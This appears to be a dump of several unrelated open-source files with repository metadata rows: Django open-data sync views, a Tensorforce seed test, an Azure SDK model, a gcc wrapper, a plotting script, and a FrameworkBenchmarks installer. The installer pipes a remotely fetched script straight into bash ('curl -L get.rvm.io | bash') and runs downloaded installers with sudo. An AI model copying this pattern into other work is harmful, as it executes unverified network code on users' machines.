wgs84locate = latlng(0.0, 0.0)
loc = location(address,wgs84locate)
g = temple(jsonObj[u"寺廟名稱"],jsonObj[u"地區"],jsonObj[u"主祀神像"],jsonObj[u"教別"],jsonObj[u"組織型態"],loc,jsonObj[u"寺廟電話 1"],jsonObj[u"寺廟電話 2"])
templeLst.append(g)
except urllib.error.HTTPError as e:
print(e.code)
print(e.read().decode("utf-8-sig"))
if len(templeLst) > 0:
# sync templeInfo to database
for item in templeLst:
filterResult = TempleInfo.objects.filter_temple(name = item.name, locateRegion = item.locateRegion, masterGod = item.mastergod)
if len(filterResult) == 0:
templeItem = TempleInfo.objects.create_temple(name=item.name, locateRegion=item.locateRegion, religiousBelief=item.religiousBelief,
masterGod=item.mastergod, address=item.location.address, latitude=item.location.latlng.lat,
longitude=item.location.latlng.lng, phone1=item.phone1, phone2=item.phone2)
elif len(filterResult) == 1 and filterResult[0].latitude == 0 and filterResult[0].longitude == 0 :
latitude = item.location.latlng.lat
longitude = item.location.latlng.lng
if latitude != 0 and longitude != 0:
filterResult[0].latitude = latitude
filterResult[0].longitude = longitude
filterResult[0].save()
return HttpResponse(json.dumps({"status": "Success"}),
content_type="application/json")
else:
return HttpResponse(json.dumps({"status": "Fail"}),
content_type = "application/json")
@csrf_protect
def syncCultureInfo(request):
assert isinstance(request, HttpRequest)
req = Request("http://opendata.hccg.gov.tw/dataset/28f1cd76-59b9-4877-b350-b064db635eb8/resource/82c2be17-0593-429b-842b-409735a9860f/download/20151119195903997.json")
activityLst = []
success = False
try:
response = urllib.request.urlopen(req)
ur = response.readall().decode('utf-8-sig')
j_obj = json.loads(ur)
for jsonObj in j_obj:
address = jsonObj[u"地點地址"]
success, lat, lng = AddressToLatlng(address)
if success == True:
wgs84locate = latlng(lat, lng)
loc = location(address,wgs84locate)
else:
wgs84locate = latlng(0.0, 0.0)
loc = location(address,wgs84locate)
activity = cultureActiviy(jsonObj[u"活動主題"],jsonObj[u"起始日"],jsonObj[u"截止日"],jsonObj[u"時間"],jsonObj[u"活動名稱"],jsonObj[u"地點"],loc)
activityLst.append(activity)
except urllib.error.HTTPError as e:
print(e.code)
print(e.read().decode("utf-8-sig"))
if len(activityLst) > 0:
# sync CultureActiviyInfo to database
for item in activityLst:
filterResult = CultureActiviyInfo.objects.filter_activity(name = item.name,activityTheme = item.activityTheme, locationName = item.locationName,
address = item.location.address, startDate = item.startDate, endDate = item.endDate)
if len(filterResult) == 0:
templeItem = CultureActiviyInfo.objects.create_activity(name=item.name, activityTheme=item.activityTheme,locationName= item.locationName,
address=item.location.address, latitude=item.location.latlng.lat, longitude=item.location.latlng.lng,
startDate = item.startDate, endDate = item.endDate, activityTime = item.time)
elif len(filterResult) == 1 and filterResult[0].latitude == 0 and filterResult[0].longitude == 0 :
latitude = item.location.latlng.lat
longitude = item.location.latlng.lng
if latitude != 0 and longitude != 0:
filterResult[0].latitude = latitude
filterResult[0].longitude = longitude
filterResult[0].save()
return HttpResponse(json.dumps({"status": "Success"}),
content_type="application/json")
else:
return HttpResponse(json.dumps({"status": "Fail"}),
content_type = "application/json")
@csrf_protect
def syncReputationOfAnimalHospital(request):
assert isinstance(request, HttpRequest)
req = Request("http://opendata.hccg.gov.tw/dataset/9055d606-9231-4e67-a8bf-2500d736962d/resource/cbefd6b2-8e1b-4348-8136-085241266c92/download/20150306111824929.json")
response = urllib.request.urlopen(req)
ur = response.readall().decode('utf-8-sig')
ahr = ReputationService(ur)
hos = ahr.get_animal_hospitals() # (success, address, latitude, longitude)
links = ahr.get_hospital_links(hos.keys())
data = ahr.blog_crawler(links)
rep = ahr.get_reputation(hos, data) # name: ((success, address, latitude, longitude), {'positive':score,'negative':score})
jsformat = json.dumps(rep)
repLst = []
for k, v in rep.items():
wgs84locate = latlng(v[0][2], v[0][3])
locateLatlng = location(v[0][1],wgs84locate)
repItem = hospitalReputation(k,locateLatlng,v[1]['positive'],v[1]['negative'])
repLst.append(repItem)
if len(repLst) > 0:
# sync CultureActiviyInfo to database
for item in repLst:
filterResult = AnamialHospitalReputation.objects.filter_reputation(name=item.name,address=item.location.address)
today = date.today()
if len(filterResult) == 0:
templeItem = AnamialHospitalReputation.objects.create_reputation(name=item.name,address=item.location.address,
latitude=item.location.latlng.lat,longitude=item.location.latlng.lng,
postiveScore=item.positiveReputation,negativeScore=item.negativeReputation,
dataDT=today)
elif len(filterResult) == 1:
if item.location.latlng.lat == 0 or item.location.latlng.lng == 0 :
filterResult[0].latitude = item.location.latlng.lat
filterResult[0].longitude = item.location.latlng.lng
filterResult[0].postiveScore = item.positiveReputation
filterResult[0].negativeScore = item.negativeReputation
filterResult[0].dataDT = today
filterResult[0].save()
return HttpResponse(json.dumps({"status": "Success"}),
content_type="application/json")
@csrf_protect
def syncCityNews(request):
assert isinstance(request, HttpRequest)
req = Request("http://opendata.hccg.gov.tw/dataset/e9443b8a-da93-46a9-b794-49aabbb815fd/resource/0f3f2cb2-2552-44bf-ba08-54dfaafda034/download/20151127133908155.json")
newsLst = []
success = False
try:
response = urllib.request.urlopen(req)
ur = response.readall().decode('utf-8-sig')
j_obj = json.loads(ur)
for jsonObj in j_obj:
start = TaiwanDateToStdDate(jsonObj[u"發布起始日期"])
end = TaiwanDateToStdDate(jsonObj[u"發布截止日期"])
news = cityNewes(jsonObj[u"標題"],start,end,jsonObj[u"類別"],jsonObj[u"內容"],jsonObj[u"圖片路徑(1)"])
newsLst.append(news)
except urllib.error.HTTPError as e:
print(e.code)
print(e.read().decode("utf-8-sig"))
if len(newsLst) > 0:
# sync CityNewsItem to database
for item in newsLst:
filterResult = CityNewsItem.objects.filter_news(title = item.title, type = item.type, publishDate = item.publishDate, endDate = item.endDate)
if len(filterResult) == 0:
templeItem = CityNewsItem.objects.create_news(title = item.title, type = item.type,content = item.content, publishDate = item.publishDate,
endDate = item.endDate, picturePath = item.picturePath)
elif len(filterResult) == 1 :
filterResult[0].content = item.content
filterResult[0].picturePath = item.picturePath
filterResult[0].save()
return HttpResponse(json.dumps({"status": "Success"}),
content_type="application/json")
else:
return HttpResponse(json.dumps({"status": "Fail"}),
content_type = "application/json")
def cultureActivities(request):
"""Renders the about page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/cultureActivities.html',
context_instance = RequestContext(request,
{
'title':'當月藝文活動',
'year':datetime.now().year,
}))
def cityNews(request):
"""Renders the about page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/cityNews.html',
context_instance = RequestContext(request,
{
'title':'市府新聞',
'year':datetime.now().year,
}))
def TaiwanDateToStdDate(dateStr):
return datetime.strptime(dateStr, "%Y%m%d")
@csrf_protect
def filterCultureActivities(request):
assert isinstance(request, HttpRequest)
keyword = request.POST['keyword']
filterActivities = CultureActiviyInfo.objects.filterByKeyword(keyword)
data = serializers.serialize("json", filterActivities, fields=('name','activityTheme',
'address','latitude','longitude',
'locationName','startDate','endDate','activityTime'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "activityInfo": decoded}),
content_type="application/json")
@csrf_protect
def getTop10News(request):
assert isinstance(request, HttpRequest)
topNews = CityNewsItem.objects.TopNews()
data = serializers.serialize("json", topNews, fields=('title','type','content',
'publishDate','picturePath'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "news": decoded}),
content_type="application/json")
@csrf_protect
def searchAnimalHospitalByName(request):
assert isinstance(request, HttpRequest)
name = request.POST['name']
topRputations = AnamialHospitalReputation.objects.filterByName(name)
data = serializers.serialize("json", topRputations, fields=('name','address','latitude','longitude',
'postiveScore','negativeScore','dataDT'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "reputation": decoded}),
content_type="application/json")
@csrf_protect
def getTop10AnimalHospital(request):
assert isinstance(request, HttpRequest)
topRputations = AnamialHospitalReputation.objects.Top10Hospital()
data = serializers.serialize("json", topRputations, fields=('name','address','latitude','longitude',
'postiveScore','negativeScore','dataDT'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "reputation": decoded}),
content_type="application/json")
@csrf_protect
def getReputationOfAnimalHospital(request):
assert isinstance(request, HttpRequest)
allRputations = AnamialHospitalReputation.objects.getAll()
data = serializers.serialize("json", allRputations, fields=('name','address','latitude','longitude',
'postiveScore','negativeScore','dataDT'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "reputation": decoded}),
content_type="application/json")
def animalHospitalReputation(request):
assert isinstance(request, HttpRequest)
return render(request,
'app/animalHospitalReputation.html',
context_instance = RequestContext(request,
{
'title':'動物醫院評比',
'year':datetime.now().year,
}))
def memberPerformance(request):
"""Renders the about page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/memberPerformance.html',
context_instance = RequestContext(request,
{
'title':'議員所提地方建設建議事項',
'year':datetime.now().year,
})) | mit | 9,109,989,609,018,349,000 | 41.778022 | 173 | 0.602631 | false |
reinforceio/tensorforce | test/test_seed.py | 1 | 5230 | # Copyright 2020 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import unittest
import numpy as np
from test.unittest_base import UnittestBase
class TestSeed(UnittestBase, unittest.TestCase):
def test_seed(self):
self.start_tests()
states = dict(
int_state=dict(type='int', shape=(2,), num_values=4),
float_state=dict(type='float', shape=(2,), min_value=1.0, max_value=2.0),
)
actions = dict(
int_action=dict(type='int', shape=(2,), num_values=4),
float_action=dict(type='float', shape=(2,), min_value=1.0, max_value=2.0),
)
agent, environment = self.prepare(
states=states, actions=actions, config=dict(
seed=0, device='CPU', eager_mode=True, create_debug_assertions=True,
tf_log_level=20
)
)
print_environment = False
print_agent = False
states = environment.reset()
if print_environment:
print(states['int_state'])
print(states['float_state'])
else:
self.assertTrue(expr=np.allclose(a=states['int_state'], b=np.asarray([2, 3])))
self.assertTrue(expr=np.allclose(
a=states['float_state'], b=np.asarray([1.33350747, 1.92415877])
))
actions = agent.act(states=states)
if print_agent:
print(actions['int_action'])
print(actions['float_action'])
else:
self.assertTrue(expr=np.allclose(a=actions['int_action'], b=np.asarray([0, 0])))
self.assertTrue(expr=np.allclose(
a=actions['float_action'], b=np.asarray([1.5049707, 1.4608247])
))
states, terminal, reward = environment.execute(actions=actions)
updated = agent.observe(terminal=terminal, reward=reward)
if print_environment:
print(states['int_state'])
print(states['float_state'])
print(terminal, reward, updated)
else:
self.assertTrue(expr=np.allclose(a=states['int_state'], b=np.asarray([1, 2])))
self.assertTrue(expr=np.allclose(
a=states['float_state'], b=np.asarray([1.71033683, 1.0078841])
))
self.assertFalse(expr=terminal)
self.assertEqual(first=reward, second=0.6888437030500962)
self.assertFalse(expr=updated)
actions = agent.act(states=states)
if print_agent:
print(actions['int_action'])
print(actions['float_action'])
else:
self.assertTrue(expr=np.allclose(a=actions['int_action'], b=np.asarray([3, 3])))
self.assertTrue(expr=np.allclose(
a=actions['float_action'], b=np.asarray([1.5072203, 1.6714704])
))
states, terminal, reward = environment.execute(actions=actions)
updated = agent.observe(terminal=terminal, reward=reward)
if print_environment:
print(states['int_state'])
print(states['float_state'])
print(terminal, reward, updated)
else:
self.assertTrue(expr=np.allclose(a=states['int_state'], b=np.asarray([1, 3])))
self.assertTrue(expr=np.allclose(
a=states['float_state'], b=np.asarray([1.60039224, 1.58873961])
))
self.assertFalse(expr=terminal)
self.assertEqual(first=reward, second=0.515908805880605)
self.assertFalse(expr=updated)
actions = agent.act(states=states)
if print_agent:
print(actions['int_action'])
print(actions['float_action'])
else:
self.assertTrue(expr=np.allclose(a=actions['int_action'], b=np.asarray([0, 3])))
self.assertTrue(expr=np.allclose(
a=actions['float_action'], b=np.asarray([1.6693485, 1.7339616])
))
states, terminal, reward = environment.execute(actions=actions)
updated = agent.observe(terminal=terminal, reward=reward)
if print_environment:
print(states['int_state'])
print(states['float_state'])
print(terminal, reward, updated)
else:
self.assertTrue(expr=np.allclose(a=states['int_state'], b=np.asarray([1, 0])))
self.assertTrue(expr=np.allclose(
a=states['float_state'], b=np.asarray([1.13346147, 1.98058013])
))
self.assertFalse(expr=terminal)
self.assertEqual(first=reward, second=-0.15885683833831)
self.assertFalse(expr=updated)
| apache-2.0 | 6,577,528,081,546,557,000 | 39.230769 | 92 | 0.585468 | false |
Azure/azure-sdk-for-python | sdk/cognitiveservices/azure-cognitiveservices-language-textanalytics/azure/cognitiveservices/language/textanalytics/models/entity_record.py | 1 | 2689 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class EntityRecord(Model):
"""EntityRecord.
Variables are only populated by the server, and will be ignored when
sending a request.
:param name: Entity formal name.
:type name: str
:param matches: List of instances this entity appears in the text.
:type matches:
list[~azure.cognitiveservices.language.textanalytics.models.MatchRecord]
:param wikipedia_language: Wikipedia language for which the WikipediaId
and WikipediaUrl refers to.
:type wikipedia_language: str
:param wikipedia_id: Wikipedia unique identifier of the recognized entity.
:type wikipedia_id: str
:ivar wikipedia_url: URL for the entity's Wikipedia page.
:vartype wikipedia_url: str
:param bing_id: Bing unique identifier of the recognized entity. Use in
conjunction with the Bing Entity Search API to fetch additional relevant
information.
:type bing_id: str
:param type: Entity type from Named Entity Recognition model
:type type: str
:param sub_type: Entity sub type from Named Entity Recognition model
:type sub_type: str
"""
_validation = {
'wikipedia_url': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'matches': {'key': 'matches', 'type': '[MatchRecord]'},
'wikipedia_language': {'key': 'wikipediaLanguage', 'type': 'str'},
'wikipedia_id': {'key': 'wikipediaId', 'type': 'str'},
'wikipedia_url': {'key': 'wikipediaUrl', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'sub_type': {'key': 'subType', 'type': 'str'},
}
def __init__(self, **kwargs):
super(EntityRecord, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.matches = kwargs.get('matches', None)
self.wikipedia_language = kwargs.get('wikipedia_language', None)
self.wikipedia_id = kwargs.get('wikipedia_id', None)
self.wikipedia_url = None
self.bing_id = kwargs.get('bing_id', None)
self.type = kwargs.get('type', None)
self.sub_type = kwargs.get('sub_type', None)
| mit | 6,033,418,252,891,552,000 | 39.134328 | 78 | 0.612495 | false |
poondog/kangaroo-m7-mkv | scripts/gcc-wrapper.py | 1 | 3884 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2011-2012, Code Aurora Forum. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Code Aurora nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Invoke gcc, looking for warnings, and causing a failure if there are
# non-whitelisted warnings.
import errno
import re
import os
import sys
import subprocess
# Note that gcc uses unicode, which may depend on the locale. TODO:
# force LANG to be set to en_US.UTF-8 to get consistent warnings.
allowed_warnings = set([
"return_address.c:62",
"swab.h:49",
"SemaLambda.cpp:946",
"CGObjCGNU.cpp:1414",
"BugReporter.h:146",
"RegionStore.cpp:1904",
"SymbolManager.cpp:484",
"RewriteObjCFoundationAPI.cpp:737",
"RewriteObjCFoundationAPI.cpp:696",
"CommentParser.cpp:394",
"CommentParser.cpp:391",
"CommentParser.cpp:356",
"LegalizeDAG.cpp:3646",
"IRBuilder.h:844",
"DataLayout.cpp:193",
"transport.c:653",
"xt_socket.c:307",
"xt_socket.c:161",
"inet_hashtables.h:356",
"xc4000.c:1049",
"xc4000.c:1063",
])
# Capture the name of the object file, can find it.
ofile = None
warning_re = re.compile(r'''(.*/|)([^/]+\.[a-z]+:\d+):(\d+:)? warning:''')
def interpret_warning(line):
"""Decode the message from gcc. The messages we care about have a filename, and a warning"""
line = line.rstrip('\n')
m = warning_re.match(line)
if m and m.group(2) not in allowed_warnings:
print "error, forbidden warning:", m.group(2)
# If there is a warning, remove any object if it exists.
if ofile:
try:
os.remove(ofile)
except OSError:
pass
sys.exit(1)
def run_gcc():
args = sys.argv[1:]
# Look for -o
try:
i = args.index('-o')
global ofile
ofile = args[i+1]
except (ValueError, IndexError):
pass
compiler = sys.argv[0]
try:
proc = subprocess.Popen(args, stderr=subprocess.PIPE)
for line in proc.stderr:
print line,
interpret_warning(line)
result = proc.wait()
except OSError as e:
result = e.errno
if result == errno.ENOENT:
print args[0] + ':',e.strerror
print 'Is your PATH set correctly?'
else:
print ' '.join(args), str(e)
return result
if __name__ == '__main__':
status = run_gcc()
sys.exit(status)
| gpl-2.0 | 3,073,904,154,896,566,300 | 32.482759 | 97 | 0.664779 | false |
alican/django-tus | django_tus/response.py | 1 | 1169 | from django.conf import settings
from django.http import HttpResponse
from django_tus import tus_api_version, tus_api_version_supported, tus_api_extensions
class TusResponse(HttpResponse):
_base_tus_headers = {
'Tus-Resumable': tus_api_version,
'Tus-Version': ",".join(tus_api_version_supported),
'Tus-Extension': ",".join(tus_api_extensions),
'Tus-Max-Size': settings.TUS_MAX_FILE_SIZE,
'Access-Control-Allow-Origin': "*",
'Access-Control-Allow-Methods': "PATCH,HEAD,GET,POST,OPTIONS",
'Access-Control-Expose-Headers': "Tus-Resumable,upload-length,upload-metadata,Location,Upload-Offset",
'Access-Control-Allow-Headers': "Tus-Resumable,upload-length,upload-metadata,Location,Upload-Offset,content-type",
'Cache-Control': 'no-store'
}
def add_headers(self, headers: dict):
for key, value in headers.items():
self.__setitem__(key, value)
def __init__(self, extra_headers=None, *args, **kwargs):
super().__init__(*args, **kwargs)
self.add_headers(self._base_tus_headers)
if extra_headers:
self.add_headers(extra_headers)
| mit | -2,560,518,202,457,547,000 | 39.310345 | 122 | 0.655261 | false |
cemagg/sucem-fem | sandbox/flux_calc/plotty.py | 1 | 1219 | from __future__ import division
import pylab
import numpy as np
import run_data
reload(run_data)
def get_unit_gradients(resdict, ind=0, op=lambda x: x):
return dict((k, np.gradient(op(v[ind])))
for k,v in resdict.iteritems())
def get_gradients(resdict, op1=lambda x: x, op2=lambda x: x):
return dict((k, np.gradient(op1(v[1])) / np.gradient(op2(v[0])))
for k,v in resdict.iteritems())
def logify(resdict, op=lambda x: x):
return dict((k, np.log(op(v))) for k,v in resdict.iteritems())
vflux_gradients_unity = get_unit_gradients(run_data.vflux, ind=1,
op=lambda x: np.real(x))
vflux_gradients = get_gradients(run_data.vflux, op1=np.real)
vflux_log = logify(vflux_gradients, op=np.abs)
vflux_log_h = logify(run_data.vflux, op=lambda x: x[0])
pylab.figure(1)
pylab.hold(0)
pylab.plot(-vflux_log_h['1r'], vflux_log['1r'], label='reversed')
pylab.hold(1)
pylab.plot(-vflux_log_h['1'], vflux_log['1'], label='forward')
pylab.legend(loc=0)
pylab.figure(2)
pylab.hold(0)
pylab.plot(-vflux_log_h['2r'], vflux_log['2r'], label='reversed')
pylab.hold(1)
pylab.plot(-vflux_log_h['2'], vflux_log['2'], label='forward')
pylab.legend(loc=0)
| gpl-3.0 | 247,746,161,481,558,900 | 32.861111 | 68 | 0.647252 | false |
astrilchuk/sd2xmltv | libschedulesdirect/common/servicecountry.py | 1 | 1174 | import logging
class ServiceCountry(object):
def __init__(self):
self.full_name = None # type: unicode
self.short_name = None # type: unicode
self.postal_code_example = None # type: unicode
self.postal_code_regex = None # type: unicode
self.one_postal_code = False # type: bool
@classmethod
def from_dict(cls, dct): # type: (dict) -> ServiceCountry
"""
:param dct:
:return:
"""
service_country = cls()
if "fullName" in dct:
service_country.full_name = dct.pop("fullName")
if "shortName" in dct:
service_country.short_name = dct.pop("shortName")
if "postalCodeExample" in dct:
service_country.postal_code_example = dct.pop("postalCodeExample")
if "postalCode" in dct:
service_country.postal_code_regex = dct.pop("postalCode")
if "onePostalCode" in dct:
service_country.onePostalCode = dct.pop("onePostalCode")
if len(dct) != 0:
logging.warn("Key(s) not processed for ServiceCountry: %s", ", ".join(dct.keys()))
return service_country
| mit | 825,535,162,735,604,700 | 26.302326 | 94 | 0.580068 | false |
morrisonlevi/FrameworkBenchmarks | toolset/setup/linux/installer.py | 1 | 25198 | import subprocess
import os
import time
import traceback
import sys
class Installer:
############################################################
# install_software
############################################################
def install_software(self):
if self.benchmarker.install == 'all' or self.benchmarker.install == 'server':
self.__install_server_software()
if self.benchmarker.install == 'all' or self.benchmarker.install == 'database':
self.__install_database_software()
if self.benchmarker.install == 'all' or self.benchmarker.install == 'client':
self.__install_client_software()
############################################################
# End install_software
############################################################
############################################################
# __install_server_software
############################################################
def __install_server_software(self):
print("\nINSTALL: Installing server software\n")
#######################################
# Prerequisites
#######################################
self.__run_command("sudo apt-get update", True)
self.__run_command("sudo apt-get upgrade", True)
self.__run_command("sudo apt-get install build-essential libpcre3 libpcre3-dev libpcrecpp0 libssl-dev zlib1g-dev python-software-properties unzip git-core libcurl4-openssl-dev libbz2-dev libmysqlclient-dev mongodb-clients libreadline6-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt-dev libgdbm-dev ncurses-dev automake libffi-dev htop libtool bison libevent-dev libgstreamer-plugins-base0.10-0 libgstreamer0.10-0 liborc-0.4-0 libwxbase2.8-0 libwxgtk2.8-0 libgnutls-dev libjson0-dev libmcrypt-dev libicu-dev cmake gettext curl libpq-dev mercurial mlton", True)
self.__run_command("sudo add-apt-repository ppa:ubuntu-toolchain-r/test", True)
self.__run_command("sudo apt-get update", True)
self.__run_command("sudo apt-get install gcc-4.8 g++-4.8", True)
self.__run_command("cp ../config/benchmark_profile ../../.bash_profile")
self.__run_command("cat ../config/benchmark_profile >> ../../.profile")
self.__run_command("cat ../config/benchmark_profile >> ../../.bashrc")
self.__run_command("source ../../.profile")
self.__run_command("sudo sh -c \"echo '* - nofile 65535' >> /etc/security/limits.conf\"")
##############################################################
# System Tools
##############################################################
#
# Leiningen
#
self.__run_command("mkdir -p bin")
self.__download("https://raw.github.com/technomancy/leiningen/stable/bin/lein")
self.__run_command("mv lein bin/lein")
self.__run_command("chmod +x bin/lein")
#
# Maven
#
self.__run_command("sudo apt-get install maven -qq")
self.__run_command("mvn -version")
#######################################
# Languages
#######################################
self._install_python()
#
# Dart
#
self.__download("https://storage.googleapis.com/dart-editor-archive-integration/latest/dartsdk-linux-64.tar.gz")
self.__run_command("tar xzf dartsdk-linux-64.tar.gz")
#
# Erlang
#
self.__run_command("sudo cp ../config/erlang.list /etc/apt/sources.list.d/erlang.list")
self.__download("http://binaries.erlang-solutions.com/debian/erlang_solutions.asc")
self.__run_command("sudo apt-key add erlang_solutions.asc")
self.__run_command("sudo apt-get update")
self.__run_command("sudo apt-get install esl-erlang", True)
#
# nodejs
#
self.__download("http://nodejs.org/dist/v0.10.8/node-v0.10.8-linux-x64.tar.gz")
self.__run_command("tar xzf node-v0.10.8-linux-x64.tar.gz")
#
# Java
#
self.__run_command("sudo apt-get install openjdk-7-jdk", True)
self.__run_command("sudo apt-get remove --purge openjdk-6-jre openjdk-6-jre-headless", True)
#
# Ruby/JRuby
#
self.__run_command("curl -L get.rvm.io | bash -s head")
self.__run_command("echo rvm_auto_reload_flag=2 >> ~/.rvmrc")
self.__bash_from_string("source ~/.rvm/scripts/'rvm' && rvm install 2.0.0-p0")
self.__bash_from_string("source ~/.rvm/scripts/'rvm' && rvm 2.0.0-p0 do gem install bundler")
self.__bash_from_string("source ~/.rvm/scripts/'rvm' && rvm install jruby-1.7.8")
self.__bash_from_string("source ~/.rvm/scripts/'rvm' && rvm jruby-1.7.8 do gem install bundler")
#
# go
#
self.__download("http://go.googlecode.com/files/go1.2.linux-amd64.tar.gz");
self.__run_command("tar xzf go1.2.linux-amd64.tar.gz")
#
# Perl
#
self.__download("http://downloads.activestate.com/ActivePerl/releases/5.16.3.1603/ActivePerl-5.16.3.1603-x86_64-linux-glibc-2.3.5-296746.tar.gz");
self.__run_command("tar xzf ActivePerl-5.16.3.1603-x86_64-linux-glibc-2.3.5-296746.tar.gz");
self.__run_command("sudo ./install.sh --license-accepted --prefix /opt/ActivePerl-5.16 --no-install-html", cwd="ActivePerl-5.16.3.1603-x86_64-linux-glibc-2.3.5-296746", send_yes=True, retry=True)
self.__download("http://cpanmin.us", "cpanminus.pl")
self.__run_command("perl cpanminus.pl --sudo App::cpanminus", retry=True)
self.__run_command("cpanm -f -S DBI DBD::mysql Kelp Dancer Mojolicious Kelp::Module::JSON::XS Dancer::Plugin::Database Starman Plack JSON Web::Simple DBD::Pg JSON::XS EV HTTP::Parser::XS Monoceros EV IO::Socket::IP IO::Socket::SSL", retry=True)
#
# php
#
self.__download("http://www.php.net/get/php-5.4.13.tar.gz/from/us1.php.net/mirror")
self.__run_command("tar xzf php-5.4.13.tar.gz")
self.__run_command("./configure --with-pdo-mysql --with-mysql --with-mcrypt --enable-intl --enable-mbstring --enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --with-openssl", cwd="php-5.4.13")
self.__run_command("make", cwd="php-5.4.13")
self.__run_command("sudo make install", cwd="php-5.4.13")
self.__run_command("printf \"\\n\" | sudo pecl install apc-beta", cwd="php-5.4.13", retry=True)
self.__run_command("sudo cp ../config/php.ini /usr/local/lib/php.ini")
self.__run_command("sudo cp ../config/php-fpm.conf /usr/local/lib/php-fpm.conf")
self.__run_command("rm php-5.4.13.tar.gz")
# Composer
self.__download("https://getcomposer.org/installer", "composer-installer.php")
self.__run_command("php composer-installer.php --install-dir=bin")
# Phalcon
self.__run_command("git clone git://github.com/phalcon/cphalcon.git", retry=True)
self.__run_command("sudo ./install", cwd="cphalcon/build")
# YAF
self.__run_command("sudo pecl install yaf")
#
# Haskell
#
self.__run_command("sudo apt-get install ghc cabal-install", True)
#
# RingoJs
#
self.__download("http://www.ringojs.org/downloads/ringojs_0.9-1_all.deb")
self.__run_command("sudo apt-get install jsvc", True)
self.__run_command("sudo dpkg -i ringojs_0.9-1_all.deb", True)
self.__run_command("rm ringojs_0.9-1_all.deb")
#
# Mono
#
self.__run_command("git clone git://github.com/mono/mono", retry=True)
self.__run_command("git checkout mono-3.2.3", cwd="mono")
self.__run_command("./autogen.sh --prefix=/usr/local", cwd="mono")
self.__run_command("make get-monolite-latest", cwd="mono")
self.__run_command("make EXTERNAL_MCS=${PWD}/mcs/class/lib/monolite/gmcs.exe", cwd="mono")
self.__run_command("sudo make install", cwd="mono")
self.__run_command("mozroots --import --sync", retry=True)
self.__run_command("git clone git://github.com/mono/xsp", retry=True)
self.__run_command("./autogen.sh --prefix=/usr/local", cwd="xsp")
self.__run_command("make", cwd="xsp")
self.__run_command("sudo make install", cwd="xsp")
#
# Nimrod
#
self.__download("http://www.nimrod-code.org/download/nimrod_0.9.2.zip")
self.__run_command("unzip nimrod_0.9.2.zip")
self.__run_command("chmod +x build.sh", cwd="nimrod")
self.__run_command("./build.sh", cwd="nimrod")
self.__run_command("chmod +x install.sh", cwd="nimrod")
self.__run_command("sudo ./install.sh /usr/bin", cwd="nimrod")
#
# Racket
#
self.__run_command("sudo apt-get install racket", True)
#
# Ur/Web
#
self.__run_command("hg clone http://hg.impredicative.com/urweb/")
self.__run_command("./autogen.sh", cwd="urweb")
self.__run_command("./configure", cwd="urweb")
self.__run_command("make", cwd="urweb")
self.__run_command("sudo make install", cwd="urweb")
#######################################
# Webservers
#######################################
#
# Nginx
#
self.__download("http://nginx.org/download/nginx-1.4.1.tar.gz")
self.__run_command("tar xzf nginx-1.4.1.tar.gz")
self.__run_command("./configure", cwd="nginx-1.4.1")
self.__run_command("make", cwd="nginx-1.4.1")
self.__run_command("sudo make install", cwd="nginx-1.4.1")
#
# Openresty (nginx with openresty stuff)
#
self.__download("http://openresty.org/download/ngx_openresty-1.2.7.5.tar.gz")
self.__run_command("tar xzf ngx_openresty-1.2.7.5.tar.gz")
self.__run_command("./configure --with-luajit --with-http_postgres_module", cwd="ngx_openresty-1.2.7.5")
self.__run_command("make", cwd="ngx_openresty-1.2.7.5")
self.__run_command("sudo make install", cwd="ngx_openresty-1.2.7.5")
#
# Resin
#
